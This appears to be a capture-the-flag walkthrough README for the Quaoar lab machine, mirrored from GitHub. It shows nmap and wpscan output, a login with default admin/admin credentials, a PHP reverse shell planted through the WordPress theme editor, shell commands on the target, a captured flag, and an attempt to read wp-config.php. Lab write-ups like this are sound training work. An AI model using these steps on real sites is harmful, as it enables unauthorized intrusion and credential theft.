Giters

boaxboax / ctf-Quaorar

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ctf-Quaorar

Opening with NMAP : PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) 53/tcp open domain ISC BIND 9.8.1-P1 | dns-nsid: |_ bind.version: 9.8.1-P1 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3? 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-10-16T05:14:13+00:00; 0s from scanner time. 995/tcp open ssl/pop3s? | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 MAC Address: 08:00:27:77:97:F9 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.5 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

and one dirb //dirb http://192.168.1.96/ /home/boax/Téléchargements/common.txt

Entering directory: http://192.168.1.96/wordpress/ ---- ==> DIRECTORY: http://192.168.1.96/wordpress/index/

Site builded with wordpress !

wpscan attack /

ruby wpscan.rb -u http://192.168.1.96/wordpress --enumerate u

    __          _______   _____                  
    \ \        / /  __ \ / ____|                 
     \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
      \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
       \  /\  /  | |     ____) | (__| (_| | | | |
        \/  \/   |_|    |_____/ \___|\__,_|_| |_|

    WordPress Security Scanner by the WPScan Team 
                   Version 2.9.4-dev
      Sponsored by Sucuri - https://sucuri.net
  @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

[+] URL: http://192.168.1.96/wordpress/ [+] Started: Thu Oct 19 20:14:14 2017

[+] Enumerating usernames ... [+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | admin | admin | | 2 | wpuser | wpuser | +----+--------+--------+

Log on http://192.168.1.96/wordpress/wp-login.php?loggedout=true with admin/admin .

Then , on the dashboard , on Apparence / Editor / Header , we can put a reverseShell ( http://pentestmonkey.net/tools/web-shells/php-reverse-shell ) . Set up with ur IP and with for example the port 4444 open .

So listen on 4444 : which python /usr/bin/python $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@Quaoar:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@Quaoar:/$ ls -lat ls -lat total 85 drwxr-xr-x 15 root root 4000 Oct 19 2017 dev drwxr-xr-x 117 root root 4096 Oct 19 2017 etc drwxr-xr-x 13 root root 0 Oct 19 2017 sys drwxrwxrwt 3 root root 4096 Oct 19 14:23 tmp drwxr-xr-x 24 root root 780 Oct 19 14:12 run dr-xr-xr-x 107 root root 0 Oct 19 14:12 proc drwxr-xr-x 13 root root 4096 Jan 15 2017 var drwx------ 6 root root 4096 Nov 30 2016 root drwxr-xr-x 4 root root 1024 Oct 28 2016 boot drwxr-xr-x 2 root root 4096 Oct 28 2016 sbin drwxr-xr-x 3 root root 4096 Oct 24 2016 home drwxr-xr-x 22 root root 4096 Oct 7 2016 . drwxr-xr-x 22 root root 4096 Oct 7 2016 .. -rw------- 1 root root 1024 Oct 7 2016 .rnd drwxr-xr-x 21 root root 4096 Oct 7 2016 lib drwxr-xr-x 2 root root 4096 Oct 7 2016 bin lrwxrwxrwx 1 root root 33 Oct 7 2016 vmlinuz -> boot/vmlinuz-3.2.0-23-generic-pae lrwxrwxrwx 1 root root 37 Oct 7 2016 initrd.img -> /boot/initrd.img-3.2.0-23-generic-pae drwxr-xr-x 3 root root 4096 Oct 7 2016 media drwxr-xr-x 10 root root 4096 Oct 7 2016 usr drwxr-xr-x 2 root root 4096 Oct 7 2016 opt drwxr-xr-x 2 root root 4096 Oct 7 2016 srv drwx------ 2 root root 16384 Oct 7 2016 lost+found drwxr-xr-x 2 root root 4096 Apr 19 2012 mnt drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux

further ...

cd home www-data@Quaoar:/home$ ls ls wpadmin www-data@Quaoar:/home$ cd wpadmin cd wpadmin www-data@Quaoar:/home/wpadmin$ ls ls flag.txt www-data@Quaoar:/home/wpadmin$ cat flag.txt cat flag.txt 2bafe61f03117ac66a73c3c514de796e

The flag1 !!!

So , lets go on :

cd var www-data@Quaoar:/var$ ls ls backups cache crash lib local lock log mail opt run spool tmp www www-data@Quaoar:/var$ cd www cd www www-data@Quaoar:/var/www$ ls ls CHANGELOG hack-planet-high-definition-mobile.jpg COPYING hacker-manifesto-ethical.jpg Hack_The_Planet.jpg hacking.jpg Hack_The_Planet2.jpg hsperfdata_tomcat6 Hack_The_Planet3.jpg index.html INSTALL pososibo-ethical-hacking-hack-fond.jpg LICENSE robots.txt Quaoar.jpg tomcat6-tomcat6-tmp README.md upload hack-planet-1280-amox-zone.jpg wordpress www-data@Quaoar:/var/www$ cd wordpress cd wordpress www-data@Quaoar:/var/www/wordpress$ ls ls index.php wp-blog-header.php wp-cron.php wp-mail.php license.txt wp-comments-post.php wp-includes wp-settings.php readme.html wp-config-sample.php wp-links-opml.php wp-signup.php wp-activate.php wp-config.php wp-load.php wp-trackback.php wp-admin wp-content wp-login.php xmlrpc.php

and cat wp-config.php cat wp-config.php

About